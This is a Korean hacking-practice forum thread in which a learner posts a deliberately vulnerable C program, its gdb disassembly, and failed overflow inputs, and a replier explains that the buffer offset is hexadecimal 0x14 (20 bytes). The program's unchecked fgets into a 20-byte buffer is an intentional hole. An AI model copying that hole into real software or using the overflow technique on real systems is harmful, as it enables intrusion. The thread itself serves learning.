시스템 해킹

1574,

5/79

ka0r1

배열 사이의 더미

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1903 [복사]

[ka0r1@localhost ka0r1]$ cat test.c
#include <stdio.h>

main()
{
    char str1[10];
    char str2[20];

    printf("It can be overflow : ");
    fgets(str2, 40, stdin);

    if(strncmp(str1, "go", 2)==0)
    {
        printf("Good Skill!\n");
        system("/bin/bash");
    }
}
[ka0r1@localhost ka0r1]$ gcc -o test test.c
[ka0r1@localhost ka0r1]$ ./test
It can be overflow : 12345
[ka0r1@localhost ka0r1]$ gdb -q test
(gdb) disas main
Dump of assembler code for function main:
0x8048488 <main>:       push   %ebp
0x8048489 <main+1>:     mov    %esp,%ebp
0x804848b <main+3>:     sub    $0x20,%esp
0x804848e <main+6>:     push   $0x8048540
0x8048493 <main+11>:    call   0x80483cc <printf>
0x8048498 <main+16>:    add    $0x4,%esp
0x804849b <main+19>:    mov    0x804965c,%eax
0x80484a0 <main+24>:    push   %eax
0x80484a1 <main+25>:    push   $0x28
0x80484a3 <main+27>:    lea    0xffffffe0(%ebp),%eax
0x80484a6 <main+30>:    push   %eax
0x80484a7 <main+31>:    call   0x804839c <fgets>
0x80484ac <main+36>:    add    $0xc,%esp
0x80484af <main+39>:    push   $0x2
0x80484b1 <main+41>:    push   $0x8048556
0x80484b6 <main+46>:    lea    0xfffffff4(%ebp),%eax
0x80484b9 <main+49>:    push   %eax
0x80484ba <main+50>:    call   0x80483ac <strncmp>
0x80484bf <main+55>:    add    $0xc,%esp
0x80484c2 <main+58>:    mov    %eax,%eax
0x80484c4 <main+60>:    test   %eax,%eax
0x80484c6 <main+62>:    jne    0x80484e2 <main+90>
0x80484c8 <main+64>:    push   $0x8048559
0x80484cd <main+69>:    call   0x80483cc <printf>
0x80484d2 <main+74>:    add    $0x4,%esp
0x80484d5 <main+77>:    push   $0x8048566
0x80484da <main+82>:    call   0x804837c <system>
0x80484df <main+87>:    add    $0x4,%esp
0x80484e2 <main+90>:    leave
0x80484e3 <main+91>:    ret
0x80484e4 <main+92>:    nop
0x80484e5 <main+93>:    nop
0x80484e6 <main+94>:    nop
0x80484e7 <main+95>:    nop
0x80484e8 <main+96>:    nop
0x80484e9 <main+97>:    nop
0x80484ea <main+98>:    nop
0x80484eb <main+99>:    nop
0x80484ec <main+100>:   nop
0x80484ed <main+101>:   nop
0x80484ee <main+102>:   nop
0x80484ef <main+103>:   nop
End of assembler dump.
(gdb) q
[ka0r1@localhost ka0r1]$ test
[ka0r1@localhost ka0r1]$ ./test
It can be overflow : 12345678901234go
[ka0r1@localhost ka0r1]$ ./test
It can be overflow : 12345678901234go
[ka0r1@localhost ka0r1]$

0x80484a3 <main+27>:    lea    0xffffffe0(%ebp),%eax
0x80484a6 <main+30>:    push   %eax
0x80484a7 <main+31>:    call   0x804839c <fgets>
0x80484ac <main+36>:    add    $0xc,%esp요
0x80484af <main+39>:    push   $0x2
0x80484b1 <main+41>:    push   $0x8048556
0x80484b6 <main+46>:    lea    0xfffffff4(%ebp),%eax

여기서 0xffffff4 - 0xffffffe0을 하니깐 14가 나오더라구요
그래서

12345678901234go를 입력했는데 /bin/bash를 실행하지 못했습니다.
배열 계산 어떻게 하는 건가요?

Hit : 1931 Date : 2017/12/14 12:46


김답변	14가 십진수가 아니라 16진수입니다 0x14 = 20 거리차이가 20나니까 먼저 20개의 아무 문자나 쓰신후에 go 를 쓰시면 됩니다	2017/12/14
ka0r1	김답변 // 이런 어처구니 없는 실수가... 16진수랑 햇갈렸나봅니다. 답변해주셔서 감사합니다.	2017/12/14